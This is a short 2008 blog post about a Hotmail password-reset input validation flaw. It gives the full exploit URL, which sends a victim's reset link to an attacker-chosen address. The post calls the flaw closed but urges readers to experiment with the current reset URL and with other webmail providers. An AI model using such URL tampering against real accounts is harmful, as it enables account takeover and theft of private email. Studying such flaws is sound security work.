May 162008

05.16.08 by justy

I’ve been doing some reading on input validation attacks to gain illegal access to email accounts. One example that i read was about Microsoft Corporation’s Hotmail & it was called the Reset Password Input Validation attack. Basically, this would allow the attacker to reset the password of any victim the attacker chose without any interruptions. Such as, the security question. The attacker could execute the attack by copy & pasting this URL into the address bar:

https://register.passport.net/emailpwdreset.srf?1c=1033&em=victim@hotmail.com&id=&cb=&prefem =attacker@attacker.com&rst=1

Of course the victim@hotmail is the password whose will be reset. The attacker@attacker.com sets up an account to where the victims reset password link will be sent to. After the above URL is entered in the address bar, an email will be sent to the attackers account with the link to reset the victims password. Can you believe something so simple as this URL string can allow access to sensitive information, even bypassing the security question? Pretty neat loophole. Of course, this loophole has been closed, but if you look at the email password reset URL now from hotmail, & play around with it a bit, you can figure it out :p As i am sure, the same can be done with other Web-based email service providers.

VN:F [1.9.6_1107]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.6_1107]
Rating: 0 (from 0 votes)
Posted by admin Tagged with: , ,
Rss Feed Tweeter button Facebook button Technorati button Myspace button Digg button Stumbleupon button Newsvine button Youtube button

© 2010-2017 She-Geeks.com All Rights Reserved